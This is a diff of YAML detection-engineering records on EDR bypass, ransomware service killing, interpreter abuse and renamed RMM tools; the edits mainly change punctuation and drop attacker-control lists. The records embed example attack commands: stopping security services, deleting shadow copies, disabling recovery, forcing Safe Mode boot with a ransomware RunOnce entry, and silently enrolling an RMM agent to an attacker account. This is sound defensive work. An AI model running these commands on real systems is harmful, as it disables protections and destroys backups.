||||
Artifacts:
|
||||
- 'Sysmon EID 7: Boolang or IronPython DLLs loaded by .NET process'
|
||||
- 'Sysmon EID 1: .NET host with interpreter-related assemblies'
|
||||
@@ -224,18 +224,6 @@ Prerequisites:
|
||||
- The scripting interpreter must be a legitimately signed binary compatible with the target OS
|
||||
- Attacker-controlled script content must be accessible to the interpreter (local file, inline argument, or remote fetch)
|
||||
- No application whitelisting policy blocking execution of the specific interpreter binary from non-standard paths
|
||||
AttackerControls:
|
||||
- Choice of interpreter (Python, PHP, Node.js, Ruby, Perl, AutoHotKey)
|
||||
- Obfuscation of the script payload
|
||||
- Script content and payload
|
||||
- Delivery method for the interpreter
|
||||
- Persistence mechanism for the interpreter
|
||||
AttackerCannotControl:
|
||||
- Must introduce a non-default interpreter runtime (binary on disk or DLLs loaded in-memory)
|
||||
- Must launch the interpreter process or load interpreter DLLs into a host
|
||||
- Interpreter binary/DLLs are vendor-signed (legitimate code)
|
||||
- Process creation or DLL load event logs the non-standard interpreter
|
||||
- Network connections from the interpreter are logged
|
||||
|
||||
EvolutionTimeline:
|
||||
- Date: 2019-Q3
|
||||
@@ -349,7 +337,7 @@ Detections:
|
||||
ExpectedFPRate: Medium
|
||||
UseCase: >
|
||||
Active threat hunting for BYOSI deployment. Correlates interpreter execution with
|
||||
script loading or network callback — the two behaviors that distinguish malicious
|
||||
script loading or network callback, the two behaviors that distinguish malicious
|
||||
from benign interpreter presence.
|
||||
SigmaRule: sigma-rules/byosi/hunt.yml
|
||||
|
||||
@@ -443,7 +431,7 @@ OsintSources:
|
||||
Query: 'filename:php.exe OR filename:node.exe OR filename:python.exe OR filename:ruby.exe'
|
||||
URL: https://urlscan.io/search/#filename%3Aphp.exe%20OR%20filename%3Anode.exe%20OR%20filename%3Apython.exe%20OR%20filename%3Aruby.exe
|
||||
Notes: >
|
||||
Finds websites hosting interpreter binaries packaged in ZIP archives — a common
|
||||
Finds websites hosting interpreter binaries packaged in ZIP archives, a common
|
||||
BYOSI delivery mechanism. Cross-reference with known malware distribution domains.
|
||||
|
||||
References:
|
||||
|
||||
@@ -17,9 +17,9 @@ ThreatPrevalence: HIGH
|
||||
DetectionDifficulty: HIGH
|
||||
Description: 'Adversaries impair or neutralize EDR/AV products before executing their primary payload to prevent detection
|
||||
and response. Techniques span from user-mode API unhooking (removing hooks EDRs inject into ntdll.dll) through kernel-level
|
||||
driver exploitation (BYOVD — Bring Your Own Vulnerable Driver) to direct process termination of security tools. Despite
|
||||
driver exploitation (BYOVD, Bring Your Own Vulnerable Driver) to direct process termination of security tools. Despite
|
||||
the diversity of techniques, the chokepoint is invariant: admin/SYSTEM privileges are always required, and the bypass mechanism
|
||||
always produces a kernel-observable artifact — a driver load event, a VirtualProtect call against protected system memory,
|
||||
always produces a kernel-observable artifact. This is a driver load event, a VirtualProtect call against protected system memory,
|
||||
or direct termination of a security process. As of 2024, approximately 48% of high-severity ransomware attacks incorporate
|
||||
purpose-built EDR disablement (Cisco Talos). BYOVD has become a de facto phase in major ransomware deployment chains.
|
||||
|
||||
@@ -96,7 +96,7 @@ Variations:
|
||||
SourceURL: https://www.sophos.com/en-us/blog/burnt-cigar-2/
|
||||
NotesShort: Purpose-built malicious driver with stolen certs; EDR wiper capability since 2024
|
||||
Notes: 'Custom-built kernel driver (POORTRY) with dedicated userland loader (STONESTOP). Not a repurposed vulnerable
|
||||
driver — purpose-built malicious driver signed with stolen/forged certificates. Used by Cuba, BlackCat, Medusa, LockBit,
|
||||
driver. It is a purpose-built malicious driver signed with stolen/forged certificates. Used by Cuba, BlackCat, Medusa, LockBit,
|
||||
RansomHub. Evolved from process termination to full EDR file wiping in 2024.'
|
||||
VariantId: byovd-poortry-stonestop
|
||||
Command:
|
||||
@@ -104,7 +104,7 @@ Variations:
|
||||
idmtdi.sys / Internet Download Manager)\n \u2192 driver signed with stolen cert (rotates: \"bopsoft\", \"Evangel
|
||||
Technology\", \"FEI XIAO\", etc.)\n \u2192 sends IOCTLs to:\n a) Remove kernel notify callbacks\n b) Terminate
|
||||
EDR processes\n c) Delete EDR files from disk (2024+ capability)"
|
||||
Context: 'Certificate roulette — multiple variants with different certs deployed in same attack. 2024+: deletes EDR
|
||||
Context: 'Certificate roulette: multiple variants with different certs deployed in same attack. 2024+: deletes EDR
|
||||
executable files and DLLs from disk. Operates in two deletion modes: by file type or by specific filename.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 11: Driver file dropped, masquerading as legitimate software driver'
|
||||
@@ -118,7 +118,7 @@ Variations:
|
||||
FirstSeen: 2022-Q1
|
||||
Status: Active
|
||||
SourceURL: https://github.com/wavestone-cdt/EDRSandblast
|
||||
NotesShort: Removes kernel callbacks without killing EDR processes — EDR runs blind
|
||||
NotesShort: Removes kernel callbacks without killing EDR processes. EDR runs blind.
|
||||
Notes: 'Directly removes registered kernel callbacks (PsSetCreateProcessNotifyRoutine, PsSetLoadImageNotifyRoutine) from
|
||||
the kernel callback array, blinding EDRs at the kernel level without killing their processes. Uses hardcoded kernel
|
||||
offsets to avoid BSOD. Absence of expected callbacks is detectable via memory analysis.'
|
||||
@@ -134,7 +134,7 @@ Variations:
|
||||
- 'Sysmon EID 6: Vulnerable driver loaded (used for kernel R/W)'
|
||||
- 'Sysmon EID 1: EDRSandblast execution with --kernelmode or --all flags'
|
||||
- 'Memory analysis: Absence of expected kernel callbacks (PsNotifyRoutine array zeroed)'
|
||||
- 'No process termination events — EDR processes stay alive but blinded'
|
||||
- 'No process termination events. EDR processes stay alive but blinded.'
|
||||
ChokepointMapping: 'admin → vulnerable driver loaded for kernel R/W → kernel callback arrays patched → EDR blinded (no process/image notifications)'
|
||||
- Name: PPL Abuse (PPLKiller / PPLdump)
|
||||
FirstSeen: 2020-Q4
|
||||
@@ -166,7 +166,7 @@ Variations:
|
||||
Eliminates all user-mode EDR visibility without touching the kernel.'
|
||||
VariantId: user-mode-unhooking-ntdll-fresh-copy
|
||||
Command:
|
||||
Invocation: "# Embedded in malware — no standalone CLI:\nntdll_base = LoadLibraryEx(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",
|
||||
Invocation: "# Embedded in malware. No standalone CLI.\nntdll_base = LoadLibraryEx(\"C:\\\\Windows\\\\System32\\\\ntdll.dll\",
|
||||
LOAD_LIBRARY_AS_DATAFILE)\n# Overwrite .text section of hooked ntdll with clean copy"
|
||||
Context: 'Technique is embedded in malware code, not a standalone tool. Kernel-level ETW Threat-Intelligence providers
|
||||
still fire on sensitive operations.'
|
||||
@@ -191,7 +191,7 @@ Variations:
|
||||
Artifacts:
|
||||
- 'ETW: Microsoft-Windows-Kernel-Process shows unusual syscall patterns'
|
||||
- 'Call stack analysis: syscall return address not within ntdll.dll memory range'
|
||||
- 'No single CLI command — technique is embedded in malware code'
|
||||
- 'No single CLI command. Technique is embedded in malware code.'
|
||||
ChokepointMapping: 'malware execution → direct syscall instructions bypass ntdll hooks → EDR userland visibility bypassed'
|
||||
- Name: ETW Patching (EtwEventWrite)
|
||||
FirstSeen: 2020-Q2
|
||||
@@ -234,13 +234,13 @@ Variations:
|
||||
SourceURL: https://github.com/netero1010/EDRSilencer
|
||||
NotesShort: Blocks EDR network comms via WFP filters; EDR runs but cannot report
|
||||
Notes: 'Blocks EDR network communication using Windows Filtering Platform (WFP) callout drivers to prevent telemetry and
|
||||
alerts from reaching the management console. Does not kill EDR processes — instead creates a silent EDR that cannot
|
||||
alerts from reaching the management console. Does not kill EDR processes. Instead creates a silent EDR that cannot
|
||||
report. Requires admin privileges.'
|
||||
VariantId: edrsilencer
|
||||
Command:
|
||||
Invocation: "EDRSilencer.exe blockedr\n# Enumerates running EDR processes\n# Creates WFP filters blocking their
|
||||
outbound network traffic\n# EDR continues running but telemetry never reaches console"
|
||||
Context: 'Alternative to process termination — EDR stays alive but isolated from its management plane.'
|
||||
Context: 'Alternative to process termination. EDR stays alive but isolated from its management plane.'
|
||||
Artifacts:
|
||||
- 'Security EID 5441: WFP filter installation'
|
||||
- 'Sysmon EID 1: EDRSilencer process execution'
|
||||
@@ -257,7 +257,7 @@ Variations:
|
||||
memory detections. Still used in Cobalt Strike and Havoc.'
|
||||
VariantId: module-stomping-reflective-dll-injection
|
||||
Command:
|
||||
Invocation: "# Embedded in C2 frameworks — no standalone CLI:\n# 1. Load legitimate DLL (e.g., amsi.dll)\n# 2. Overwrite
|
||||
Invocation: "# Embedded in C2 frameworks. No standalone CLI.\n# 1. Load legitimate DLL (e.g., amsi.dll)\n# 2. Overwrite
|
||||
.text section with shellcode\n# 3. Execute from legitimate DLL's address space"
|
||||
Context: 'Technique is built into C2 frameworks (Cobalt Strike, Havoc). Leaves no disk artifact for the injected code.'
|
||||
Artifacts:
|
||||
@@ -276,7 +276,7 @@ Variations:
|
||||
Command:
|
||||
Invocation: "bcdedit /set {default} safeboot minimal\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"
|
||||
/v \"payload\" /t REG_SZ /d \"C:\\temp\\ransomware.exe\" /f\nshutdown /r /f /t 0"
|
||||
Context: 'Sets next boot to Safe Mode (minimal — no networking). Registers ransomware as RunOnce entry. Forces
|
||||
Context: 'Sets next boot to Safe Mode (minimal, no networking). Registers ransomware as RunOnce entry. Forces
|
||||
immediate reboot. EDR services are not configured for Safe Mode boot.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 1: bcdedit.exe with /set and safeboot arguments'
|
||||
@@ -298,22 +298,10 @@ Prerequisites:
|
||||
- For kernel callback removal: ability to read/write kernel memory (via vulnerable driver)
|
||||
- For user-mode techniques: VirtualProtect/NtProtectVirtualMemory access to target DLL memory
|
||||
- Target EDR must be using one of the impaired mechanisms (user-mode hooks, ETW, kernel callbacks)
|
||||
AttackerControls:
|
||||
- Choice of bypass method (BYOVD, callback removal, PPL abuse, unhooking)
|
||||
- Specific vulnerable driver or tool used
|
||||
- Evasion technique for the driver/tool itself
|
||||
- Timing relative to payload execution
|
||||
- Persistence mechanism for the bypass
|
||||
AttackerCannotControl:
|
||||
- Must obtain admin/SYSTEM privileges before any bypass
|
||||
- Must load a kernel driver or modify kernel memory
|
||||
- Security process/service must be stopped, killed, or blinded
|
||||
- Driver load event is logged by Sysmon EID 6
|
||||
- Process termination or service state change is logged
|
||||
Chokepoints:
|
||||
- Stage: Privilege Escalation
|
||||
Input: Attacker has code execution on the target but lacks admin rights
|
||||
Invariant: Must obtain admin or SYSTEM privileges — no BYOVD, callback removal, or PPL abuse works without elevation
|
||||
Invariant: Must obtain admin or SYSTEM privileges. No BYOVD, callback removal, or PPL abuse works without elevation.
|
||||
Observable: 'Sysmon EID 1 showing privilege escalation (token manipulation, UAC bypass, service exploitation) or process
|
||||
running with high integrity level'
|
||||
WhyCantBypass: Kernel drivers require admin to load. Process termination of protected processes requires SYSTEM. No EDR
|
||||
@@ -326,9 +314,9 @@ Chokepoints:
|
||||
SigmaRef: sigma-rules/edr-bypass/hunt.yml
|
||||
- Stage: EDR Telemetry Disruption
|
||||
Input: Attacker has admin/SYSTEM privileges
|
||||
Invariant: Must disrupt EDR telemetry collection through one of these mechanisms — load a kernel driver (BYOVD), modify
|
||||
kernel memory (callback removal), patch userland hooks (ntdll unhooking, direct syscalls), patch ETW/AMSI functions,
|
||||
block EDR network traffic (WFP filters), or boot into Safe Mode where EDR services don't load
|
||||
Invariant: Must disrupt EDR telemetry collection. Options include loading a kernel driver (BYOVD), modifying
|
||||
kernel memory (callback removal), patching userland hooks (ntdll unhooking, direct syscalls), patching ETW/AMSI functions,
|
||||
blocking EDR network traffic (WFP filters), or booting into Safe Mode where EDR services don't load.
|
||||
Observable: 'Kernel path: Sysmon EID 6 (Driver Loaded) for BYOVD variants. Userland path: Sysmon EID 7 (second ntdll.dll
|
||||
loaded) or ETW-TI VirtualProtect on EtwEventWrite/AmsiScanBuffer. Network path: Security EID 5441 (WFP filter installed).
|
||||
Safe Mode: Sysmon EID 1 showing bcdedit with safeboot argument.'
|
||||
@@ -424,7 +412,7 @@ EvolutionTimeline:
|
||||
DetectionImpact: Existing BYOVD and kernel callback removal detections may catch underlying technique, but new tool signatures
|
||||
and delivery via HR-themed lures require updated behavioral and email/endpoint rules.
|
||||
TheConstant: Still requires admin/SYSTEM privileges on the target system to disable EDR, and must impair kernel callbacks,
|
||||
user-mode hooks, or ETW — the core invariant prerequisites remain unchanged.
|
||||
user-mode hooks, or ETW. The core invariant prerequisites remain unchanged.
|
||||
Variants: []
|
||||
EventType: event
|
||||
Detections:
|
||||
@@ -459,8 +447,8 @@ Detections:
|
||||
UseCase: Proactive hunt for BYOVD-based EDR killing; correlates driver load with subsequent security tool impairment
|
||||
SigmaRule: sigma-rules/edr-bypass/hunt.yml
|
||||
- Level: Analyst
|
||||
Description: Known vulnerable or recently signed driver load immediately followed by security process termination — direct
|
||||
EDR kill signal
|
||||
Description: Known vulnerable or recently signed driver load immediately followed by security process termination. Direct
|
||||
EDR kill signal.
|
||||
LogSources:
|
||||
- Sysmon Event ID 6 (Driver Loaded)
|
||||
- Sysmon Event ID 1 (Process Creation)
|
||||
@@ -492,7 +480,7 @@ Intel:
|
||||
Tier: primary
|
||||
URL: https://attack.mitre.org/techniques/T1562/006/
|
||||
Description: Technique definition covering ETW patching, AMSI bypass, and other telemetry-blocking methods; distinct from
|
||||
process termination — attacker keeps EDR running but blinds it
|
||||
process termination; attacker keeps EDR running but blinds it
|
||||
- Name: Microsoft — Vulnerable Driver Blocklist
|
||||
Tier: primary
|
||||
URL: https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
|
||||
@@ -504,12 +492,12 @@ OsintSources:
|
||||
- Platform: VirusTotal Intelligence
|
||||
Query: tag:byovd positives:0
|
||||
URL: https://www.virustotal.com/gui/search/tag%3Abyovd%20positives%3A0
|
||||
Notes: Requires VT Intelligence subscription. Finds BYOVD samples with zero AV detections — the most dangerous current variants.
|
||||
Notes: Requires VT Intelligence subscription. Finds BYOVD samples with zero AV detections; these are the most dangerous current variants.
|
||||
Pivot to the behavior tab to extract the specific driver filename, hash, and kernel callback manipulation sequence.
|
||||
- Platform: GitHub Code Search
|
||||
Query: '"PsSetCreateProcessNotifyRoutine" OR "ObRegisterCallbacks" path:*.c OR path:*.cpp'
|
||||
URL: https://github.com/search?q=%22PsSetCreateProcessNotifyRoutine%22+OR+%22ObRegisterCallbacks%22&type=code
|
||||
Notes: Finds kernel driver source code interacting with process notification callbacks — the primary mechanism BYOVD tools
|
||||
Notes: Finds kernel driver source code interacting with process notification callbacks, the primary mechanism BYOVD tools
|
||||
manipulate. Monitor for new public tools targeting these APIs.
|
||||
- Platform: GitHub Code Search
|
||||
Query: '"EtwEventWrite" "0xC3" path:*.c OR path:*.asm'
|
||||
@@ -554,7 +542,7 @@ KnownBypasses:
|
||||
Mitigation: EDR solutions must implement kernel callbacks rather than relying solely on user-mode hooks; enforce application
|
||||
control to block unknown binaries
|
||||
Detection: 'Kernel-level process and thread creation callbacks still fire regardless of syscall technique. Detect by correlating
|
||||
process creation callbacks with the absence of expected user-mode telemetry — a process that creates threads but generates
|
||||
process creation callbacks with the absence of expected user-mode telemetry. A process that creates threads but generates
|
||||
no user-mode hook events is anomalous.
|
||||
|
||||
'
|
||||
@@ -568,7 +556,7 @@ RawLogs:
|
||||
- Type: Sysmon
|
||||
EventId: 6
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: Vulnerable/recently-signed kernel driver loaded — BYOVD technique initiation
|
||||
Description: Vulnerable/recently-signed kernel driver loaded. BYOVD technique initiation.
|
||||
MatchedRules:
|
||||
- Research
|
||||
Sample: 'EventID: 6 (Driver Loaded)
|
||||
@@ -585,7 +573,7 @@ RawLogs:
|
||||
|
||||
SignatureStatus: Valid
|
||||
|
||||
# Driver signed by "Raynet Inc." — a certificate issued 6 days prior to this event
|
||||
# Driver signed by "Raynet Inc.", a certificate issued 6 days prior to this event
|
||||
|
||||
# Hash matches Microsoft Vulnerable Driver Blocklist (truesight.sys / RogueKiller driver)
|
||||
|
||||
@@ -595,7 +583,7 @@ RawLogs:
|
||||
- Type: Sysmon
|
||||
EventId: 10
|
||||
Source: Microsoft-Windows-Sysmon/Operational
|
||||
Description: BYOVD process opens handle to EDR process — pre-kill access request
|
||||
Description: BYOVD process opens handle to EDR process. Pre-kill access request.
|
||||
MatchedRules:
|
||||
- Hunt
|
||||
- Analyst
|
||||
@@ -619,7 +607,7 @@ RawLogs:
|
||||
|
||||
# PROCESS_ALL_ACCESS from non-trusted process to security process
|
||||
|
||||
# Follows driver load within 5 minutes — Hunt rule correlation
|
||||
# Follows driver load within 5 minutes. Hunt rule correlation.
|
||||
|
||||
'
|
||||
- Type: Windows Event Log
|
||||
|
||||
@@ -48,7 +48,7 @@ Variations:
|
||||
NotesShort: FBI-disrupted December 2023; resumed operations, attacked Change Healthcare February 2024; exit-scammed affiliates
|
||||
March 2024 after $22M ransom
|
||||
Notes: Targets Sophos, Defender, VSS, SQL; cross-platform (Windows and Linux/ESXi); FBI disruption December 2023; exited
|
||||
via scam March 2024 after $22M Change Healthcare ransom — leadership withheld affiliate commissions and shut down infrastructure
|
||||
via scam March 2024 after $22M Change Healthcare ransom. Leadership withheld affiliate commissions and shut down infrastructure
|
||||
VariantId: alphv-blackcat
|
||||
Command:
|
||||
Invocation: "# Windows Rust binary with embedded service list:\nnet stop \"Sophos Agent\" /y\nnet stop \"vss\" /y\nnet stop \"MSSQL$SQLEXPRESS\" /y\nwmic service where \"name like '%backup%'\" call stopservice"
|
||||
@@ -97,7 +97,7 @@ Variations:
|
||||
SourceURL: https://www.trendmicro.com/en_us/research/24/d/operation-cronos-aftermath.html
|
||||
NotesShort: Operation Cronos seized 28 servers and 1,000+ decryption keys; significantly disrupted
|
||||
Notes: Comprehensive kill list (50+ services); Group Policy abuse for domain-wide deployment; Operation Cronos (February
|
||||
2024) seized 28 servers, source code, and 1000+ decryption keys — significantly reduced operational capacity
|
||||
2024) seized 28 servers, source code, and 1000+ decryption keys. Significantly reduced operational capacity
|
||||
VariantId: lockbit-3-0
|
||||
Command:
|
||||
Invocation: "# Domain-wide via Group Policy scheduled task:\nschtasks /create /tn \"Windows Update\" /tr \"C:\\windows\\temp\\lockbit.exe\" /sc once /st 00:00 /ru SYSTEM\n# Kill list (50+ services):\nsc stop SophosFileScanner\nsc stop CrowdStrike\nsc stop SentinelAgent\nsc stop veeam\nsc stop MSSQLSERVER\nsc stop wbengine\nsc stop VSS\n# ... 40+ more services\nvssadmin delete shadows /all /quiet\nbcdedit /set {default} recoveryenabled No"
|
||||
@@ -113,26 +113,14 @@ Variations:
|
||||
Prerequisites:
|
||||
- Admin or SYSTEM privileges already established on target system
|
||||
- Target security, backup, and database services are running (cannot stop what is not running)
|
||||
AttackerControls:
|
||||
- Specific services targeted (VSS, SQL, backup agents)
|
||||
- Method of stopping services (sc.exe, net.exe, WMI, PowerShell)
|
||||
- Order and timing of service stops
|
||||
- Encryption algorithm and ransom note content
|
||||
- Lateral movement method used to reach the target
|
||||
AttackerCannotControl:
|
||||
- Must run with SYSTEM privileges
|
||||
- Must enumerate running services to find targets
|
||||
- Must stop services before encryption begins
|
||||
- Service state change events are logged by the OS
|
||||
- Bulk service stops in short time window are anomalous
|
||||
Chokepoints:
|
||||
- Stage: Service Enumeration
|
||||
Input: Attacker has SYSTEM privileges on the target system
|
||||
Invariant: Actor enumerates running services to build the kill list via sc query, Get-Service, wmic, or equivalent
|
||||
Observable: 'Sysmon EID 1 showing sc.exe query, wmic service get, or Get-Service commands. Multiple service
|
||||
enumeration commands in rapid succession from the same process or user context.'
|
||||
WhyCantBypass: Ransomware cannot stop what it cannot find — service enumeration precedes every observed kill sequence across
|
||||
all documented families; sc.exe stop and delete require Admin or SYSTEM privileges, so no privilege escalation means immediate
|
||||
WhyCantBypass: Ransomware cannot stop what it cannot find. Service enumeration precedes every observed kill sequence across
|
||||
all documented families. sc.exe stop and delete require Admin or SYSTEM privileges, so no privilege escalation means immediate
|
||||
failure before enumeration can complete
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (sc.exe query / wmic service get / Get-Service)
|
||||
@@ -142,10 +130,10 @@ Chokepoints:
|
||||
- Stage: Bulk Service Stop
|
||||
Input: Service kill list has been built via enumeration
|
||||
Invariant: Security, backup, and database services are stopped in rapid succession via sc.exe, net stop, taskkill, or WMI
|
||||
StopService — multiple services within a short window
|
||||
StopService. Multiple services within a short window
|
||||
Observable: 'Windows System EID 7036 showing multiple security/backup services transitioning to "stopped" state
|
||||
within 60 seconds. Sysmon EID 1 showing repeated sc stop or net stop commands.'
|
||||
WhyCantBypass: Files locked by running services cannot be encrypted — stop must precede encryption in every observed ransomware
|
||||
WhyCantBypass: Files locked by running services cannot be encrypted. Stop must precede encryption in every observed ransomware
|
||||
family without exception
|
||||
LogSources:
|
||||
- Windows System Event ID 7036 (Service State Change — stopped)
|
||||
@@ -154,14 +142,14 @@ Chokepoints:
|
||||
DetectionTier: Hunt
|
||||
SigmaRef: sigma-rules/ransomware-service/hunt.yml
|
||||
BypassNote: Purpose-built EDR killers (BYOVD drivers, EDRKillShifter) bypass service-stop detection by killing the EDR process
|
||||
at kernel level — monitor Sysmon EID 6 for suspicious driver loads immediately before bulk service termination
|
||||
at kernel level. Monitor Sysmon EID 6 for suspicious driver loads immediately before bulk service termination
|
||||
- Stage: Service Deletion
|
||||
Input: Target services have been stopped
|
||||
Invariant: Stopped services are deleted or permanently disabled to prevent automatic restart during the encryption phase
|
||||
Observable: 'Sysmon EID 1 showing sc.exe delete or sc.exe config start= disabled commands targeting security
|
||||
and backup services. Registry changes under HKLM\SYSTEM\CurrentControlSet\Services\ confirming service deletion.'
|
||||
WhyCantBypass: Without deletion, Windows service recovery policies restart stopped services and interfere with encryption
|
||||
— deletion is confirmed across all major documented families
|
||||
WhyCantBypass: Without deletion, Windows service recovery policies restart stopped services and interfere with encryption.
|
||||
Deletion is confirmed across all major documented families
|
||||
LogSources:
|
||||
- Sysmon Event ID 1 (sc.exe delete / sc.exe config start= disabled)
|
||||
- Sysmon Event ID 12/13 (Registry key deletion under Services hive)
|
||||
|
||||
@@ -14,7 +14,7 @@ Description: 'Legitimate remote management and monitoring (RMM) tools are rename
|
||||
(tax documents, invoices, IT support tools) and delivered via browser download. Once executed, the RMM establishes persistent
|
||||
command-and-control to attacker infrastructure while appearing to be a signed, legitimate binary. Because the binary is
|
||||
legitimately signed by the vendor, many security tools will not flag it. The chokepoint is the browser download, file masquerading,
|
||||
user execution, and outbound connection to RMM infrastructure — all of which are required regardless of which RMM tool is
|
||||
user execution, and outbound connection to RMM infrastructure. All of which are required regardless of which RMM tool is
|
||||
used.
|
||||
|
||||
'
|
||||
@@ -27,7 +27,7 @@ Variations:
|
||||
SourceURL: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a
|
||||
NotesShort: Declining; February 2024 production breach revoked signing cert, driving actor migration
|
||||
Notes: 'Common masquerade names: invoice.exe, tax_form.exe, SSN_verification.exe; February 2024 production server breach
|
||||
resulted in source code and code signing certificate theft — certificate revoked, driving threat actor migration to other
|
||||
resulted in source code and code signing certificate theft. Certificate revoked, driving threat actor migration to other
|
||||
tools'
|
||||
VariantId: anydesk
|
||||
Command:
|
||||
@@ -61,7 +61,7 @@ Variations:
|
||||
NotesShort: Primary renamed-binary choice; CVE-2024-1709 also enables direct server exploitation
|
||||
Notes: 'Common masquerade names: support_tool.exe, IT_access.exe; now primary choice for renamed-binary delivery; February
|
||||
2024 CVE-2024-1709 (auth bypass) + CVE-2024-1708 (path traversal) enabled direct server exploitation by LockBit, Black
|
||||
Basta, and Bl00dy — 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct
|
||||
Basta, and Bl00dy. 18,188 exposed instances globally at time of disclosure; dual vector: user-delivered binary AND direct
|
||||
server exploitation'
|
||||
VariantId: screenconnect-connectwise
|
||||
Command:
|
||||
@@ -149,7 +149,7 @@ Variations:
|
||||
VariantId: atera
|
||||
Command:
|
||||
Invocation: "msiexec /i AteraSetup.msi /qn INTEGRATORLOGIN=attacker@email.com ACCOUNTID=<attacker_account>\n# Silent install, agent registers to attacker's Atera account"
|
||||
Context: 'Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud — domain blocking difficult.'
|
||||
Context: 'Cloud-based RMM. MSI registers agent to attacker Atera account. Uses legitimate Atera cloud; domain blocking difficult.'
|
||||
Artifacts:
|
||||
- 'Sysmon EID 1: msiexec.exe with /qn flag installing Atera MSI'
|
||||
- 'Sysmon EID 11: AteraAgent.exe installed'
|
||||
@@ -160,7 +160,7 @@ Variations:
|
||||
Status: Active
|
||||
SourceURL: https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/
|
||||
NotesShort: First RMM deploys a second for redundancy; removes single point of C2 failure
|
||||
Notes: 'One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy — if one is removed, the other
|
||||
Notes: 'One RMM (e.g., ScreenConnect) deploys a second RMM (e.g., AnyDesk) for redundancy. If one is removed, the other
|
||||
maintains access
|
||||
|
||||
'
|
||||
@@ -189,7 +189,7 @@ MasqueradeThemes:
|
||||
- tax-document-2024.exe (inferred pattern)
|
||||
LureDetails: 'IRS impersonation emails ("Refund Eligibility Notification", "EFIN Verification Required") direct victims
|
||||
to attacker-controlled sites. Domains follow patterns like doc-irs[.]us. Microsoft documented a February 2025 wave delivering
|
||||
SimpleHelp via IRS EFIN lure. Highly seasonal — spikes January–April around US tax filing deadlines. Extend detection
|
||||
SimpleHelp via IRS EFIN lure. Highly seasonal. Spikes January–April around US tax filing deadlines. Extend detection
|
||||
with W-2, refund, enrollment pretexts during relevant periods.
|
||||
|
||||
'
|
||||
@@ -212,8 +212,8 @@ MasqueradeThemes:
|
||||
- Trojanized ScreenConnect installer (Cloudflare research)
|
||||
LureDetails: 'Emails with subjects like "Your SSN is going to be suspended (Case ID - SSA-526487442)" direct victims to
|
||||
fake SSA portals. Cloudflare Force One documented a specific campaign delivering a trojanized ScreenConnect installer
|
||||
via this pretext. Threat is escalating as public awareness of SSA disruptions increases in 2025 — lure credibility is
|
||||
currently high. ScreenConnect delivery via this theme was confirmed by Cloudflare; other RMM tools inferred from campaign
|
||||
via this pretext. Threat is escalating as public awareness of SSA disruptions increases in 2025; lure credibility is
|
||||
currently high. ScreenConnect delivery via this theme was confirmed by Cloudflare. Other RMM tools inferred from campaign
|
||||
infrastructure overlap.
|
||||
|
||||
'
|
||||
@@ -261,12 +261,12 @@ MasqueradeThemes:
|
||||
- ScreenConnect
|
||||
DocumentedFilenames:
|
||||
- Quick Assist (legitimate name)
|
||||
- AnyDesk installer (legitimate name — not renamed in this vector)
|
||||
- AnyDesk installer (legitimate name, not renamed in this vector)
|
||||
LureDetails: 'Actor impersonates internal IT helpdesk via Microsoft Teams messages or email flood + phone call. Black Basta
|
||||
(Storm-1811) documented by Rapid7 (May 2024) and ReliaQuest: actor sends thousands of spam emails to overwhelm victim
|
||||
inbox, then calls or Teams-messages offering "help," directing the victim to install Quick Assist or AnyDesk. A Teams
|
||||
+ QR code variant escalated in December 2024 (Arctic Wolf). Note: this vector typically uses legitimately-named installers
|
||||
rather than renamed binaries — the social engineering replaces the masquerade. Detection must cover both renamed-binary
|
||||
rather than renamed binaries. The social engineering replaces the masquerade. Detection must cover both renamed-binary
|
||||
and IT-directed-installation patterns.
|
||||
|
||||
'
|
||||
@@ -296,10 +296,10 @@ MasqueradeThemes:
|
||||
- E-Invite MSI
|
||||
LureDetails: 'Fake meeting invites or calendar links direct victims to attacker-controlled download pages serving RMM installers
|
||||
with legitimate-looking names. Microsoft Defender Experts (March 2026) documented signed malware (EV certificate: "TrustConnect
|
||||
Software PTY LTD") impersonating Teams, Zoom, Adobe, and Google Meet — delivering ScreenConnect, Tactical RMM, and MeshAgent.
|
||||
Software PTY LTD") impersonating Teams, Zoom, Adobe, and Google Meet, delivering ScreenConnect, Tactical RMM, and MeshAgent.
|
||||
Red Canary documented "Party Card Viewer" and "E-Invite" MSI files delivering Atera. Check Point (December 2024) documented
|
||||
Google Calendar-delivered phishing targeting 300+ organizations (4,000+ emails). The EV code signing certificate is a
|
||||
critical evasion element — signed MSI files pass many endpoint controls.
|
||||
critical evasion element. Signed MSI files pass many endpoint controls.
|
||||
|
||||
'
|
||||
Sources:
|
||||
@@ -349,7 +349,7 @@ MasqueradeThemes:
|
||||
- DocuSign/e-signature spoofs (more commonly credential harvesters, not RMM)
|
||||
LureDetails: 'HR impersonation emails (salary review, benefits enrollment, onboarding portal) deliver RMM tools. Mimecast
|
||||
specifically documented a campaign shift from credential harvesting to RMM tool deployment via HR-themed lures. This pretext
|
||||
is less common than IT support or invoice lures for RMM delivery — HR themes more frequently deliver credential harvesters
|
||||
is less common than IT support or invoice lures for RMM delivery. HR themes more frequently deliver credential harvesters
|
||||
or document-based malware. When RMM delivery does occur, it typically involves DocuSign spoofs or "sign your employment
|
||||
documents" pretexts directing victims to a download.
|
||||
|
||||
@@ -382,19 +382,7 @@ MasqueradeThemes:
|
||||
- Red Canary — fake update pages with security framing
|
||||
Prerequisites:
|
||||
- User account can execute binaries from browser download paths (Downloads, Temp, AppData)
|
||||
- RMM binary carries a valid vendor code-signing certificate — hash-based detection does not fire
|
||||
AttackerControls:
|
||||
- Choice of RMM tool (AnyDesk, ScreenConnect, TeamViewer, RustDesk)
|
||||
- Social engineering pretext (tax form, IT helpdesk, invoice)
|
||||
- Filename used to masquerade the RMM binary
|
||||
- Delivery infrastructure (compromised site, malvertising, email)
|
||||
